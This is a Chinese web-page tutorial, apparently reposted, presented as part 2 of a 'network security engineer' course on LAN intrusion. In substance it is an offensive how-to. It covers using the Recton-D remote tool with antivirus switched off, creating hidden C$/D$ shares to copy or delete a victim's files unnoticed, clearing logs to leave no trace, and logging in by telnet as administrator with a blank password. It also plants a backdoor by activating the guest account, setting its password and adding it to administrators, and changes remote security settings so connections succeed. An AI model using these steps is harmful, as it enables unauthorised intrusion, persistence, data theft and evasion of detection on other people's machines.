主頁 > 教育培訓 > 電腦培訓 > 網(wǎng)絡安全工程師教程:局域網(wǎng)入侵檢測全過程(2)

網(wǎng)絡安全工程師教程:局域網(wǎng)入侵檢測全過程(2)

  2.Recton-D賀免殺專用版還有其他功能,在\"進程\"項中,可以查看遠程主機的進程,并可任意結束其中進程;在\"共享\"項中,可以創(chuàng)建共享,我常用的是創(chuàng)建C$,D$,E$,F$,共享路徑分別對應C:\\,D:\\等,共享好后在地址欄中輸入\\\\IP\\C$,進入對方C盤,你就可以隨意復制刪除里面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標,也就不會被發(fā)現(xiàn),弄完后最好還是把共享給關掉。最后選\"日志\",清除所有日志,不留痕跡。這個軟件會被殺毒軟件當作病毒殺掉,用它時須將實時防毒關掉。

  3.上面的共享可通過CMD(程序-附件-命令提示符)完成,首先\"telnet IP\",telnet上去,鍵入y后輸入的用戶名\"administrator\",密碼為空, 進入后,開共享用net share命令,共享C$(即C盤):\"net share C$=C:\",共享system文件夾:\"net share c=c:\\winnt\\system32\",共享IPC$用:\"net share IPC$\"等,最后是關閉共享,關閉C盤共享:\"net share C$ /del\"。

  4.為方便下次入侵,可以設置后門, 查看用戶:\"net user\",激活guest用戶

  \"net user guest /active:yes\",更改guest的密碼為poco:\"net user guest poco\",把guest的權限提升為管理員權限:\"net localgroup administrators guest /add\"。

  5.telnet命令(dos命令)很多,可去網(wǎng)上查找它的命令,常用的有:查看D盤文件:\"\"dir d:\\\",查看C盤program file文件夾:\"dir c:\\PROGRA~1\\;\",60秒倒記時關機:\"shutdown -s -t 60\"

  補充說明:

  1.net use錯誤原因解決:

  (1).\"發(fā)生系統(tǒng)錯誤 1326。 登錄失?。?未知的用戶名或錯誤密碼。\"

  在遠程機的\"控制面板-文件夾選項-查看-簡單的文件共享\",去掉選取,然后再嘗試連接。簡單文件共享會把網(wǎng)絡連接權限都歸為 guest連接,是無法訪問C$等管理共享的.

  (2)\"發(fā)生系統(tǒng)錯誤 1327。 登陸失?。河脩魩粝拗啤?赡艿脑虬ú辉试S空密碼,登陸時間限制,或強制的策略限。\"在遠程機的\"控制面板-管理工具-本地安全策略-安全選項-用戶權限\"指派里,禁用\"空密碼用戶只能進行控制臺登陸\".

  (3)\"//IP/c$\"時提示找不到網(wǎng)絡途徑。在\"網(wǎng)絡和撥號連接\"中\(zhòng)"本地連接\"中選取\"Internet協(xié)議(TCP/IP)\"屬性,進入\"高級TCP/IP設置\"選\"WINS設置\"里面有一項\"啟用TCP/IP的NETBIOS\".

免責聲明:該文觀點僅代表作者本人,查查吧平臺系信息發(fā)布平臺,僅提供信息存儲空間服務,不承擔相關法律責任。圖片涉及侵權行為,請發(fā)送郵件至85868317@qq.com舉報,一經(jīng)查實,本站將立刻刪除。返回查查吧首頁,查看更多>>
提示

該文觀點僅代表作者本人,查查吧平臺系信息發(fā)布平臺,僅提供信息存儲空間服務,不承擔相關法律責任。圖片涉及侵權行為,請發(fā)送郵件至85868317@qq.com舉報,一經(jīng)查實,本站將立刻刪除。

優(yōu)惠商城

更多